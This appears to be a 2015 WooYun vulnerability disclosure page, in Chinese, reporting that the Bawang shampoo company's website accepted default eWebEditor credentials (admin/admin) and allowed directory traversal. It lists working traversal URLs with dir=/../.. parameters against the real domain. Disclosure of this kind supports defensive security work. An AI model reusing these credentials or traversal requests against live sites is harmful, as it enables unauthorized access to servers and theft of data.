当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0104268

漏洞标题:霸王洗发水旗下某站点弱口令+任意文件遍历/下载

相关厂商:www.bawang.com.cn

漏洞作者: Q1NG

提交时间:2015-03-27 20:51

修复时间:2015-05-11 20:52

公开时间:2015-05-11 20:52

漏洞类型:任意文件遍历/下载

危害等级:中

自评Rank:5

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-03-27: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-05-11: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

RT...

详细说明:

Duang~Duang~Duang 前段时间很火,于是乎就想起了成龙代言的霸王洗发水了,由于本屌丝也一直用霸王,无意就百度了下霸王,就发现了霸王官网居然被挂了黑链,肯定是由于某种漏洞,于是查询一番发现主站存在两个后台 一个/admin 一个/system 分别是两种系统
http://www.bawang.com.cn/System/
http://www.bawang.com.cn/admin/
没弱口令比较鸡肋 发现一个后台是WanHu ezEIP 这系统应该有ewebeditor 编辑器,发现一个ewebeditor后台
http://www.bawang.com.cn/system/eWebEditor/admin/ 利用默认密码 admin admin

2015-03-20_194838.jpg

默认密码成功进入 又发现目录没有写入权限, 发现很多跨目录 危及同服务器下所有子站点
http://www.bawang.com.cn/system/ewebeditor/admin/upload.asp?id=16&d_viewmode=&dir=..
http://www.bawang.com.cn/system/ewebeditor/admin/upload.asp?id=&dir=/../..
http://www.bawang.com.cn/system/ewebeditor/admin/upload.asp?id=&dir=/../../AppServ/www

2015-03-22_094408.jpg

2015-03-21_095850.jpg

2015-03-21_103034.jpg

2015-03-22_091042.jpg

危及到旗下众多子站 看到小部分裤子!

漏洞证明:

http://www.bawang.com.cn/system/ewebeditor/admin/upload.asp?id=&dir=/../..
http://www.bawang.com.cn/system/ewebeditor/admin/upload.asp?id=&dir=/../../AppServ/www

修复方案:

加强目录权限设置..

版权声明:转载请注明来源 Q1NG@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:8 (WooYun评价)